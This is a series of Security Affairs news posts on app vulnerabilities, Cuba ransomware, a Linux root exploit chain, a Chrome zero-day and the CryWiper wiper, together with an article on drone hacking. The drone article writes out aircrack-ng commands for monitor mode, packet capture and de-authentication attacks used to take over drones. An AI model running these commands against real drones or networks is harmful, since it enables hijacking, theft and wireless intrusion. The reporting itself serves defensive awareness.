Experts found multiple flaws in three Android Keyboard apps that can be exploited by remote attackers to compromise a mobile phone.
Researchers at the Synopsys Cybersecurity Research Center (CyRC) warn of three Android keyboard apps with cumulatively two million installs that are affected by multiple flaws (CVE-2022-45477, CVE-2022-45478, CVE-2022-45479, CVE-2022-45480, CVE-2022-45481, CVE-2022-45482, CVE-2022-45483) that can be exploited by attackers to compromise a mobile phone.
Keyboard and mouse apps connect to a server on a desktop or laptop computer and transmit mouse and keyboard events to a remote server.
These three Android apps (Lazy Mouse, PC Keyboard, and Telepad) are Keyboard apps available on the official Google Play Store and are used as remote keyboard and mouse.
CyRC experts warn of weak or missing authentication mechanisms, missing authorization, and insecure communication vulnerabilities in the three apps.
“An exploit of the authentication and authorization vulnerabilities could allow remote unauthenticated attackers to execute arbitrary commands. Similarly, an exploit of the insecure communication vulnerability exposes the user’s keystrokes, including sensitive information such as usernames and passwords.” reads the analysis published by CyRC.
“Mouse and keyboard applications use a variety of network protocols to exchange mouse and keystroke instructions. Although the vulnerabilities are all related to the authentication, authorization, and transmission implementations, each application’s failure mechanism is different. The CyRC found vulnerabilities that enable authentication bypasses and remote code execution in the three applications, but did not find a single method of exploitation that applies to all three.”
Impacted software are:
- Telepad versions 1.0.7 and prior
- PC Keyboard versions 30 and prior
- Lazy Mouse versions 2.0.1 and prior
Below are the details of the critical vulnerabilities:
Telepad allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication.
PC Keyboard allows remote unauthenticated users to send instructions to the server to execute arbitrary code without any previous authorization or authentication.
The default configuration of Lazy Mouse does not require a password, allowing remote unauthenticated users to execute arbitrary code with no prior authorization or authentication.
The Lazy Mouse server enforces weak password requirements and doesn’t implement rate limiting, allowing remote unauthenticated users to easily and quickly brute force the PIN and execute arbitrary commands.
The vulnerabilities were initially disclosed on August 13, 2022 and the CyRC reached published the advisory because they have yet to receive a response from the development teams behind these apps.
This is the timeline for these vulnerabilities:
- August 13, 2022: Initial disclosure
- August 18, 2022: Follow-up communication
- October 12, 2022: Final follow-up communication
- November 30, 2022: Advisory published by Synopsys
“The CyRC reached out to the developers multiple times but has not received a response within the 90 day timeline dictated by our responsible disclosure policy. These three applications are widely used but they are neither maintained nor supported, and evidently, security was not a factor when these applications were developed.” concludes the report. “The CyRC recommends removing the applications immediately.”
(SecurityAffairs – hacking, Android Keyboard)
The post Android Keyboard Apps with 2 Million downloads can remotely hack your device appeared first on Security Affairs.
Cuba ransomware gang received more than $60 million in ransom payments related to attacks against 100 entities worldwide as of August 2022.
The threat actors behind the Cuba ransomware (aka COLDDRAW, Tropical Scorpius) have demanded over 145 million U.S. Dollars (USD) and received more than $60 million in ransom payments from over 100 victims worldwide as of August 2022, the US government states.
Like other ransomware gangs, Cuba used ‘double extortion’ techniques which means that it exfiltrates data from the target systems before encrypting them and demanding a ransom payment, threatening to publicly release it if payment is not made.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory that provides technical details about the gang’s operations, including tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware.
“FBI has identified a sharp increase in the both the number of compromised U.S. entities and the ransom amounts demanded by Cuba actors.” reads the report. “Since spring 2022, Cuba ransomware actors have expanded their TTPs. Third-party and open-source reports have identified a possible link between Cuba ransomware actors, RomCom Remote Access Trojan (RAT) actors, and Industrial Spy ransomware actors.”
Since December 2021 Cuba operators are continuing to target U.S. entities Financial Services, Government Facilities, Healthcare and Public Health, Critical Manufacturing, and Information Technology.
Cuba gang has leveraged multiple techniques to gain initial access into victims’ networks, including the exploitation of nown vulnerabilities in commercial software [T1190], phishing campaigns [T1566], compromised credentials [T1078], legitimate remote desktop protocol (RDP) tools [T1563.002].
Once gained initial access, the attackers distributed Cuba ransomware on compromised systems using the Hancitor loader.
Below are the vulnerabilities exploited by the group in its attacks:
- CVE-2022-24521 – elevation of privilege flaw in Windows Common Log File System (CLFS) Driver
- CVE-2020-1472 – elevation of privilege flaw in Netlogon remote protocol (aka ZeroLogon)
In May, MalwareHunterTeam found evidence that links Cuba and the Industrial Spy crew.
Since spring 2022, multiple reports also linked RomCom RAT actors to the Cuba gang.
Additional details are included in the advisory “Alert (AA22-335A) #StopRansomware: Cuba Ransomware.”
(SecurityAffairs – hacking, CISA)
The post Cuba Ransomware received over $60M in Ransom payments as of August 2022 appeared first on Security Affairs.
Threat actors could exploit drones for payload delivery, kinetic operations, and even diversion, experts warn.
Once a niche technology, drones are about to explode in terms of market growth and enterprise adoption. Naturally, threat actors follow the trend and exploit the technology for surveillance, payload delivery, kinetic operations, and even diversion.
There exists a class of tiny and highly maneuverable devices that introduce a variety of cybersecurity risks you probably haven’t considered before.
Drones currently occupy a unique legal position as they are classified as both aircraft and networked computing devices. From a malicious drone operator perspective, this inherently grants a high level of advantageous legal ambiguity and protection to criminals operating drones as counter-attacking efforts taken by victims may violate protective regulations or laws applicable to aircraft, but also anti-hacking laws meant to provide protections to personal computers, their data, and networks.
This article is going to explore cybersecurity considerations surrounding drone platforms through an initial review of drone market trends, popular drone hacking tools, and general drone hacking techniques that may be used to compromise enterprise drone platforms, including how drone platforms themselves may be used as malicious hacking platforms.
A secondary outcome of this article is to help spur awareness around a once niche space of technology that is about to explode in terms of market growth and enterprise adoption.
According to research firm Statista, the global retail drone market is expected to reach $90 billion by 2030, with Defense, Enterprise, and Logistics being the primary industries driving growth. Within the United States alone, nearly 300,000 commercial pilot licenses have been issued as of 2022, compared to nearly 1 million individual drones that have been registered with the Federal Aviation Authority(FAA) per weight and commercial compliance rules2.
This number does not account for drone platforms operated by amateur pilots or hobbyists that do not require professional licensure or those that operate under weight limitation thresholds (typically <250 grams = no licensing/registration requirement.) that require registration with local or federal authorities.
In China, the retail drone market reached $15 billion in 2021, with projections to exceed $22 billion by 2024. Drone pilot licenses issued throughout China exceed the United States, with over 780,000 registered pilots and close to 850,000 registered drones.
These numbers inform of the possibility that a once uncluttered skyline may soon be teeming with millions of drone aircraft, and questions begin to arise regarding the sanctity of enterprise security, privacy, and potential cybersecurity threats sourcing from the sky.
Departing from the general market statistics concerning drones, it is prudent to better understand how a flying laptop poses a threat to enterprise operations. From a cybercriminal perspective, drones are an ideal tool to carry out malicious attacks because they generally provide a greater layer of separation between the bad actor, the aircraft itself, and the actions executed by the physical drone platform.
Laptops or workstations primarily operate in 2D space physically and are more easily associated to an end user whereas a flying, computerized aircraft with a range of 10km can be harder to trace to a specific individual or geographical area. Drones also offer cybercriminals a great degree of flexibility in their usage because they are affordable, highly modifiable, they can operate across a greater range of weather conditions, flight distances, and altitudes versus semi-stationary workstations hackers traditionally operate from.
Let’s dive into some examples of how enterprises must account for external drones entering their airspace and cyber threats to drones operated by the enterprise.
An external drone not owned or operated by the enterprise can achieve many objectives useful to cyber criminals wishing to attack an organization. These objectives include but are not limited to site surveillance, photographic reconnaissance, physical or electronic payload delivery, kinetic operations (flying a drone into something for a specific purpose), and as a diversionary tactic.
A prime example is using a drone to fly over a potential target to visually map out physical security barriers prior to a robbery, identifying security guard patrol locations and schedules, or determining if anyone even responds to the aircraft while it is present. Drone platforms are also commonly used globally to smuggle contraband such as drugs, cellphones, or weapons into prisons with an alarming success rate.
Enterprises with sound counter drone programs in place may still be limited in how they respond to external drone threats as it is commonly unlawful to simply shoot them down or capture them. Within the United States for example, operating a drone within Class G, uncontrolled airspace over another entity’s property without advanced notice is legally allowed. Some state and local laws allow property owners and businesses to file trespass claims against operators but the difficulty is often associating the drone platform to its operator and serving them written notice.
Similar laws allowing some degree of aerial trespass exist throughout other international jurisdictions including Australia, Singapore and the United Kingdom with certain limitations. Enterprises are at a further disadvantage as malicious drone platforms cost anywhere from a few hundred to a thousand dollars while Counter Unmanned Aircraft Systems (CUAS) can cost well into the millions of dollars per annum simply just for the software subscription, not the personnel to operate it.
From a risk management perspective, drone mitigation using detective controls such as CUAS are simply non-sustainable for many enterprises as the costs will typically far exceed the inherent risks.
Attacks against enterprise-owned drones
Cyberattacks against drones that an enterprise owns and operates is an entirely different animal. Further considerations must be taken to secure onboard storage of the drone, ensure routes drones travel are relatively safe (i.e., free from obstacles, sparsely populated, etc.) and that Wi-Fi or Radio Frequency (RF) signals used by drone platforms are properly encrypted against eavesdropping or manipulation.
Most drone platforms provide an onboard mini or micro storage disk port for local storage. Common attacks against enterprise drones include platform takeover, where an attacker uses RF, Wi-Fi or a subscription service like Aerial Armor to detect flight paths of a drone in a geographical area, perform de-authentication attacks, take over control of the drone and land the stolen drone in a location of its choosing.
From here, the attacker can physically remove onboard storage and pilfer the contents, depending on the storage configuration or potentially introduce malware via the SD card port, then leave the drone for the owner to find. Cybercriminals may also attempt to poison the geolocation instructions or Return To Home (RTH) coordinates of the drone to intentionally damage the aircraft or use it for other nefarious purposes causing the enterprise monetary damages in lost drone equipment, legal trouble, and reputational harm.
Let’s overview common tools or platforms built specifically to hack drones and see how some of these may assist cybersecurity applications in real world scenarios.
The first tool previewed in this article is Dronesploit, a Command Line Interface (CLI) solution which directly resembles and is similarly structured to the Metasploit Framework. Dronesploit seeks to combine various tools useful for penetration testing specific to drone platforms.
Dronesploit is dependent on Aircrack-ng being installed and fully functional in addition to having an appropriate wireless network adapter capable of sniffing wireless networks and performing packet injection. The first step before launching Dronesploit is to put an available wireless network interface into monitor mode using the “Airmon-ng start wlan0” command. Monitor mode status can be verified before proceeding by issuing the “iwconfig” command.
Once the wireless network interface is placed into Monitor mode, Dronesploit should be launched from a secondary command window while allowing the monitored interface to remain active. Dronesploit is ready to use once all warning messages stop prompting the user to take specific action (such as starting an interface in ‘Monitor’ mode).
Dronesploit is ideal for assessing Wi-fi based drones like DJI Tello or Hobbico drone platforms but has some general-purpose auxiliary modules that are effective across many drone models.
Some of the broadly useful commands reside in Dronesploit’ auxiliary family of modules. Metasploit users will be happy to see that Dronesploit leverages familiar command-lets to select modules, set various options and execute drone attacks.
Below is an example of the “wifi/find_ssids” command, outlining the monitored interface being used, and time out values. Dronesploit can also directly call various elements of aircrack-ng to capture and attempt to crack WPA2 wireless handshakes making it a highly versatile tool.
Danger Drone platform
The next tool the article will preview is the Danger Drone platform, as developed and discussed by penetration testing provider Bishop Fox. Dangerdrone is an affordable, mobile drone platform, leveraging a 3D printed airframe, with a Raspberry Pi small single-board computer.
It is optimized to carry a Wi-Fi pineapple for wireless network auditing and several other USB peripherals like Alfa wireless network interfaces to support aerial penetration testing efforts from a flying drone. Imagine a drone flying onto private property unnoticed, landing on the roof of a building, and performing wireless network attacks against the computers underneath or around it. Scary stuff…
The article will conclude with some more pointed drone pentesting examples using Aircrack-ng itself. Using the monitored interface from the Dronesploit example, aspects of Aircrack-ng can be used to perform several useful drone security tests, including identification of wireless drone networks, de-authentication of connected devices like a drone controller, or cracking of the WEP/WPA keys.
The below example shows how the “Airodump-ng wlan0” command is useful for identifying nearby drone wi-fi signals, including the MAC address of the broadcasting device, the network encryption scheme, and the wireless authentication standard used by the drone. In the example below, a hobbyist-level drone from Sanrock using Open Wi-Fi and a DJI drone with enhanced Wi-Fi security protections are identified.
Drones will establish a private Wi-Fi network to allow user interaction between the controller and mobile application for drone operations. The Sanrock drone has an open Wi-fi network standard that doesn’t require authentication, such as use of a Pre-shared key, to connect to it. A quick way to find the IP address of the drone Wi-Fi network in question is to try connecting to the broadcasting SSID from either Kali Linux or another system, like a mobile phone and once connected, running “ipconfig /all” to compare the IP address information to the connection properties of the drone network. Vulnerability scans and various other tools can be directed at this address to uncover other targets and start assessing them for points of entry.
Switching back to Aircrack-ng, a de-authentication attack can be accomplished using airodump-ng in conjunction with aireplay-ng. These attacks are useful for either drone takeover or obtaining the wireless network key for offline cracking. Attackers can successfully sabotage Return to Home (RTH) instructions using geolocation poisoning, where the communications between pilots and the drone platform are interrupted, initiating internal drone safety routines that automatically instruct the drone to navigate to and land in a pre-configured location, allowing physical theft of the platform.
The below command highlights how Airodump-ng is used to first discover a connected station (or client like a mobile device), and send de-authentication frames that disconnect the client. In this case, the Sanrock drone has no Wi-fi authentication mechanism like a WPA pre-shared key to capture, but tests did result in mobile application disconnection and drone takeover.
The second command “airodump-ng -c 1 –bssid 98:C9:7C: -w capture19 wlan0” is used to start a live capture file which is used primarily to capture WEP/WPA pre-shared keys and other useful details. The capture file can be sent to aircrack-ng later to attempt brute force cracking of the pre-shared key but is outside the scope of this article. With the capture running, the “aireplay-ng -0 100 -a 98:C9:7C13:8B:34 -c 3C:2E:FF:BE:9F:03 wlan0” command can be issued which results in de-authentication of the connected client. Notice a high degree of lost ethernet frames, indicating an interrupted connection. Assessments could continue using tools like Nmap and its scripting engine to locate open ports or OpenVAS to perform vulnerability scanning. With this in mind, a common trend begins to emerge showing how similar drone platforms are to mobile computing devices like laptops, and enterprises should consider assessing drone risk in a similar context.
This article doesn’t encourage unauthorized assessment of drone platforms not owned by the reader, nor does it educate the reader on in-depth hacking techniques against such platforms. The article simply demonstrates very basic approaches that may be used to assess enterprise drone security and assist enterprises in formulating defensive strategies based on their risk profile.
The article briefly showcased short-term drone market projections, which reflect the likelihood of drone presence globally. The article covered common malicious use cases enacted by bad actors, such as reconnaissance, some of the tools and platforms available to cybercriminals, and live examples of how these tools may be used maliciously.
Enterprises are accustomed to contending with cyber threats, which operate on the same ground-based playing field as they do. Now, they must be more vigilant than ever, as they must account for cyberattacks sourcing from the sky. It is vital that enterprises understand their position on drone-based risks and ensure appropriate policies, procedures, and that personnel are positioned to respond to these threats accordingly.
About the author: Adam Kohnke, contributor at CyberNews
(SecurityAffairs – hacking, drones)
The post <strong>Attack of drones: airborne cybersecurity nightmare</strong> appeared first on Security Affairs.
Qualys researchers demonstrated how to chain a new Linux flaw with two other two issues to gain full root privileges on an impacted system.
Researchers at the Qualys’ Threat Research Unit demonstrated how to chain a new Linux vulnerability, tracked as CVE-2022-3328, with two other flaws to gain full root privileges on an affected system.
The vulnerability resides in the snap-confine function on Linux operating systems, a SUID-root program installed by default on Ubuntu.
The snap-confine is used internally by snapd to construct the execution environment for snap applications, an internal tool for confining snappy applications.
The CVE-2022-3328 is a Snapd race condition issue that can lead to local privilege escalation and arbitrary code execution.
“In February 2022, Qualys Threat Research Unit (TRU) published CVE-2021-44731 in our “Lemmings” advisory. The vulnerability (CVE-2022-3328) was introduced in February 2022 by the patch for CVE-2021-44731).” reads the post published by Qualys.
“The Qualys Threat Research Unit (TRU) exploited this bug in Ubuntu Server by combining it with two vulnerabilities in multipathd called Leeloo Multipath (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973), to obtain full root privileges.”
The experts chained the CVE-2022-3328 flaw with two recently discovered flaws in Multipathd, which is a daemon in charge of checking for failed paths.
Multipathd runs as root in the default installation of several distributions, including Ubuntu.
The two vulnerabilities in the Multipathd are:
CVE-2022-41974 (CVSS 7.8) – The device-mapper-multipath allows local users to obtain root access, exploited alone or in conjunction with CVE-2022-41973. Local users that are able to write to UNIX domain sockets can bypass access controls and manipulate the multipath setup. This issue occurs because an attacker can repeat a keyword, which is mishandled when arithmetic ADD is used instead of bitwise OR. This could lead to local privilege escalation to root.
CVE-2022-41973 (CVSS 7.0) – The device-mapper-multipath allows local users to obtain root access, in conjunction with CVE-2022-41974. Local users that are able to access /dev/shm can change symlinks in multipathd due to incorrect symlink handling, which may lead to controlled file writes outside of the /dev/shm directory. This could be used indirectly for local privilege escalation to root.
“Successful exploitation of the three vulnerabilities lets any unprivileged user gain root privileges on the vulnerable device. Qualys security researchers have verified the vulnerability, developed an exploit and obtained full root privileges on default installations of Ubuntu.” Qualys added.
The FAQ section included in the advisory confirms that the vulnerability is not remotely exploitable.
(SecurityAffairs – hacking, Linux)
The post A new Linux flaw can be chained with other two bugs to gain full root privileges appeared first on Security Affairs.
- The Hacker News
- Google Rolls Out New Chrome Browser Update to Patch Yet Another Zero-Day Vulnerability
Google released security updates to address a new Chrome zero-day flaw, tracked as CVE-2022-4262, actively exploited in the wild.
Google rolled out an emergency security update for the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4262, that is actively exploited.
The vulnerability was reported by Clement Lecigne of Google’s Threat Analysis Group on November 29, 2022.
“CVE-2022-4262: Type Confusion in V8. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2022-11-29” reads the advisory published by Google. “Google is aware that an exploit for CVE-2022-4262 exists in the wild.”
As usual, Google did not share technical details about the vulnerability in order to allow users to update their Chrome installations. Anyway, threat actors can exploit the flaw to potentially achieve arbitrary code execution.
Google fixed the zero-day with the release of 108.0.5359.94 for Mac and Linux and 108.0.5359.94/.95 for Windows, which the company plans to roll out over the coming days/weeks
CVE-2022-4262 is the ninth actively exploited Chrome zero-day addressed by Google this year, below is the list of the other zero-day fixed by the tech giant:
CVE-2022-4135 – (November 25) – heap buffer overflow issue in GPU.
CVE-2022-3075 (September 2) – Insufficient data validating in the Mojo collection of runtime libraries.
- CVE-2022-2856 (August 17) – Insufficient validation of untrusted input in Intents
- CVE-2022-2294 (July 4) – Heap buffer overflow in the Web Real-Time Communications (WebRTC) component
- CVE-2022-0609 – (February 14) – use after free issue that resides in the Animation component.
Chrome users are recommended to update their installations as soon as possible to neutralize attacks attempting to exploit the zero-day.
(SecurityAffairs – hacking, zero-day)
The post Google fixed the ninth actively exploited Chrome zeroday this year appeared first on Security Affairs.
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.
If you want to also receive for free the newsletter with the international press subscribe here.
(SecurityAffairs – hacking, newsletter)
Experts spotted a new data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts.
Researchers from Kaspersky discovered a previously unknown data wiper, dubbed CryWiper, that was employed in destructive attacks against Russian mayor’s offices and courts.
The malware masquerades as ransomware, but the analysis of the code demonstrates that it does not actually encrypt, but only destroys data in the infected system.
According to Kaspersky, the wiper was first spotted in the fall of 2022 when it was employed in an attack against an organization’s network in the Russian Federation.
“After examining a sample of malware, we found out that this Trojan, although it masquerades as a ransomware and extorts money from the victim for “decrypting” data, does not actually encrypt, but purposefully destroys data in the affected system.” reads the report published by Kaspersky. “Moreover, an analysis of the Trojan’s program code showed that this was not a developer’s mistake, but his original intention.”
The CryWiper sample analyzed by the researchers is a Windows 64-bit executable that was written in C++ and compiled using the MinGW-w64 toolkit and the GCC compiler. The experts pointed out that this development process for C/C++ malware developers for Windows is unusual.
The experts believe the malware was specifically designed to target Windows systems because it uses many calls to WinAPI functions.
Once executed, CryWiper uses the Task Scheduler and the schtasks create command to create a task to run its file every 5 minutes.
The the wiper contacts the command and control server using an HTTP GET request and passes the name of the infected system as a parameter.
The C2 in turn responds with either a “run” or “do not run” command, in order to determine if the malware have to start.
In some cases, the researchers observed execution delays of 4 days (345,600 seconds) to hide the logic behind the infection.
Upon receiving a run response, CryWiper stops processes related to MySQL and MS SQL database servers, MS Exchange mail server and MS Active Directory web services using the taskkill command. This action unlocks files used by the above legitimate applications before encrypting them.
CryWiper will stop critical processes related to MySQL, MS SQL database servers, MS Exchange email servers, and MS Active Directory web services to free locked data for destruction.
The wiper also deletes shadow copies on the compromised machine to prevent victims from restoring the wiped files.
The malware also changes the HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections registry setting to prevent RDP connections to the infected system.
In order to destroy user files, the wiper generates a sequence of data using the pseudo-random number generator “Mersenne Vortex” overwrite the original file content.
The malware appends the .CRY extension to the files it has corrupted and drops ransom notes (‘README.txt’) demanding for 0.5 Bitcoin for the decrypted.
“CryWiper positions itself as a ransomware program, that is, it claims that the victim’s files are encrypted and, if a ransom is paid, they can be restored. However, this is a hoax: in fact, the data has been destroyed and cannot be returned. The activity of CryWiper once again shows that the payment of the ransom does not guarantee the recovery of files.” concludes the report.
(SecurityAffairs – hacking, CryWiper)
The post New CryWiper wiper targets Russian entities masquerading as a ransomware appeared first on Security Affairs.